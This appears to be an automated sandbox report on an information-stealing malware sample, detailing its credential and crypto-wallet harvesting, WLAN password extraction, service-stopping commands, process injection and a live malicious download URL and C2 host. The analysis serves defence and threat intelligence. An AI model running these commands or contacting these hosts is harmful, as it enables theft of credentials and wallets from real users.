          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
          Source: C:\Windows\System32\dialer.exeCode function: 19_2_00007FF744DD1C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,19_2_00007FF744DD1C64
          Source: C:\Users\user\Desktop\zufmUwylvo.exeCode function: 0_2_00000125D4017A40 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00000125D4017A40
          Source: C:\Users\user\Desktop\zufmUwylvo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Lowering of HIPS / PFW / Operating System Security Settings

          barindex
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop wuauserv
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop bits
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop dosvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: Process Memory Space: zufmUwylvo.exe PID: 4540, type: MEMORYSTR
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BB1C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data Electrum
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data Jaxx
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 4C:\Users\user\AppData\Roaming\Exodus\exodus.wallet2\
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2\
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BB733000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Application Data ExodusWeb3
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets2\
          Source: zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 1C:\Users\user\AppData\Roaming\Ethereum\keystore2\
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr All
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
          Source: C:\Users\user\Desktop\zufmUwylvo.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cert9.dbJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\key4.dbJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\places.sqliteJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7tydjrzc.default-release\cookies.sqliteJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\7tydjrzc.default-release\logins.jsonJump to behavior
          Source: C:\Users\user\Desktop\zufmUwylvo.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Mozilla\Firefox\Profiles\jfrd00o7.default\logins.jsonJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: Process Memory Space: zufmUwylvo.exe PID: 4540, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
          Windows Management Instrumentation
          11
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          31
          Disable or Modify Tools
          1
          OS Credential Dumping
          1
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts1
          Native API
          11
          Windows Service
          11
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          2
          Credential API Hooking
          2
          File and Directory Discovery
          Remote Desktop Protocol2
          Data from Local System
          11
          Encrypted Channel
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Command and Scripting Interpreter
          Logon Script (Windows)1
          Access Token Manipulation
          11
          Obfuscated Files or Information
          Security Account Manager154
          System Information Discovery
          SMB/Windows Admin Shares2
          Credential API Hooking
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts1
          Service Execution
          Login Hook11
          Windows Service
          1
          Timestomp
          NTDS541
          Security Software Discovery
          Distributed Component Object ModelInput Capture2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud Accounts1
          PowerShell
          Network Logon Script713
          Process Injection
          11
          DLL Side-Loading
          LSA Secrets251
          Virtualization/Sandbox Evasion
          SSHKeylogging3
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          File Deletion
          Cached Domain Credentials3
          Process Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Rootkit
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
          Masquerading
          Proc Filesystem1
          System Network Configuration Discovery
          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
          Virtualization/Sandbox Evasion
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Access Token Manipulation
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd713
          Process Injection
          Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task1
          Hidden Files and Directories
          KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530000 Sample: zufmUwylvo.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 79 utka.xyz 2->79 81 229.116.3.0.in-addr.arpa 2->81 83 icanhazip.com 2->83 91 Suricata IDS alerts for network traffic 2->91 93 Malicious sample detected (through community Yara rule) 2->93 95 Antivirus detection for dropped file 2->95 99 19 other signatures 2->99 10 zufmUwylvo.exe 14 9 2->10         started        15 cmd.exe 1 2->15         started        17 powershell.exe 23 2->17         started        19 5 other processes 2->19 signatures3 97 Performs DNS queries to domains with low reputation 79->97 process4 dnsIp5 85 utka.xyz 84.32.84.151, 443, 49775 NTT-LT-ASLT Lithuania 10->85 87 89.23.100.233, 3, 49781 MAXITEL-ASRU Russian Federation 10->87 89 icanhazip.com 104.16.184.241, 49777, 80 CLOUDFLARENETUS United States 10->89 71 C:\Users\user\AppData\...\zxcvbnmasd.exe, PE32+ 10->71 dropped 73 C:\Users\user\AppData\...\zufmUwylvo.exe.log, ASCII 10->73 dropped 127 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 10->127 129 Found many strings related to Crypto-Wallets (likely being stolen) 10->129 131 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 10->131 137 4 other signatures 10->137 21 zxcvbnmasd.exe 2 10->21         started        25 cmd.exe 1 10->25         started        133 Modifies power options to not sleep / hibernate 15->133 27 conhost.exe 15->27         started        37 4 other processes 15->37 135 Loading BitLocker PowerShell Module 17->135 29 conhost.exe 17->29         started        31 conhost.exe 19->31         started        33 sc.exe 1 19->33         started        35 sc.exe 1 19->35         started        39 12 other processes 19->39 file6 signatures7 process8 file9 67 C:\Users\user\AppData\...\jscseoeoqftm.tmp, PE32+ 21->67 dropped 69 C:\Program Filesbehaviorgraphoogle\Chrome\updater.exe, PE32+ 21->69 dropped 101 Multi AV Scanner detection for dropped file 21->101 103 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 21->103 105 Suspicious powershell command line found 21->105 113 6 other signatures 21->113 41 dialer.exe 21->41         started        107 Uses powercfg.exe to modify the power settings 25->107 109 Uses netsh to modify the Windows network and firewall settings 25->109 111 Tries to harvest and steal WLAN passwords 25->111 115 2 other signatures 25->115 44 netsh.exe 2 25->44         started        46 conhost.exe 25->46         started        48 findstr.exe 1 25->48         started        50 chcp.com 1 25->50         started        signatures10 process11 signatures12 119 Contains functionality to inject code into remote processes 41->119 121 Writes to foreign memory regions 41->121 123 Allocates memory in foreign processes 41->123 125 3 other signatures 41->125 52 svchost.exe 41->52 injected 54 lsass.exe 41->54 injected 57 winlogon.exe 41->57 injected 59 14 other processes 41->59 process13 signatures14 61 updater.exe 52->61         started        117 Writes to foreign memory regions 54->117 65 WmiPrvSE.exe 54->65 injected process15 file16 75 C:\Windows\Temp\jscseoeoqftm.tmp, PE32+ 61->75 dropped 77 C:\Program Filesbehaviorgraphoogle\Libs\WR64.sys, PE32+ 61->77 dropped 139 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 61->139 141 Protects its processes via BreakOnTermination flag 61->141 143 Writes to foreign memory regions 61->143 145 5 other signatures 61->145 signatures17

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          zufmUwylvo.exe68%ReversingLabsByteCode-MSIL.Trojan.Jalapeno
          zufmUwylvo.exe100%Joe Sandbox ML
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp100%AviraHEUR/AGEN.1362795
          C:\Windows\Temp\jscseoeoqftm.tmp100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp100%Joe Sandbox ML
          C:\Program Files\Google\Chrome\updater.exe29%ReversingLabs
          C:\Program Files\Google\Libs\WR64.sys5%ReversingLabs
          C:\Users\user\AppData\Local\Temp\jscseoeoqftm.tmp92%ReversingLabsWin64.Trojan.Heracles
          C:\Users\user\AppData\Local\Temp\zxcvbnmasd.exe29%ReversingLabs
          C:\Windows\Temp\jscseoeoqftm.tmp70%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          NameIPActiveMaliciousAntivirus DetectionReputation
          utka.xyz
          84.32.84.151
          truetrue
            icanhazip.com
            104.16.184.241
            truefalse
              229.116.3.0.in-addr.arpa
              unknown
              unknowntrue
                NameMaliciousAntivirus DetectionReputation
                http://icanhazip.com/false
                  https://utka.xyz/1234.exefalse
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabzufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      http://nuget.org/NuGet.exepowershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                        https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000015.00000002.11643116501.00000216F1798000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                          https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchzufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                            https://duckduckgo.com/ac/?q=zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                              https://utka.xyzzufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAB21000.00000004.00000800.00020000.00000000.sdmpfalse
                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                    https://t.me/FleshStealerzufmUwylvo.exe, 00000000.00000002.11842414529.00000125BAE81000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11842414529.00000125BABB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        https://go.micropowershell.exe, 00000015.00000002.11618898711.00000216DA5BD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          http://i.pki.goog/r1.crt0zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            https://contoso.com/Licensepowershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              https://contoso.com/Iconpowershell.exe, 00000015.00000002.11635417801.00000216E91F9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  http://crl.rootca1.amazontrust.com/rootca1.crl0zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    https://aka.ms/winsvr-2022-pshelpXzupowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlXzupowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        http://www.microsoft.powershell.exe, 00000015.00000002.11643879616.00000216F18FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          http://ocsp.rootca1.amazontrust.com0:zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB544000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAEEC000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBD5E000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB7DF000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CABED000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CBB89000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF24000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CB9B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            https://www.ecosia.org/newtab/zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              https://github.com/Pester/Pesterpowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                https://www.google.com/favicon.icozufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  http://pesterbdd.com/images/Pester.pngXzupowershell.exe, 00000015.00000002.11618898711.00000216D93AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    https://ac.ecosia.org/autocomplete?q=zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      https://www.google.comzufmUwylvo.exe, 00000000.00000002.11912723601.00000125D338E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAF69000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACA1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD21000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD41000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAD01000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CAB49000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACC1000.00000004.00000800.00020000.00000000.sdmp, zufmUwylvo.exe, 00000000.00000002.11872543287.00000125CACE1000.00000004.00000800.00020000.00000000.sdmpfalse
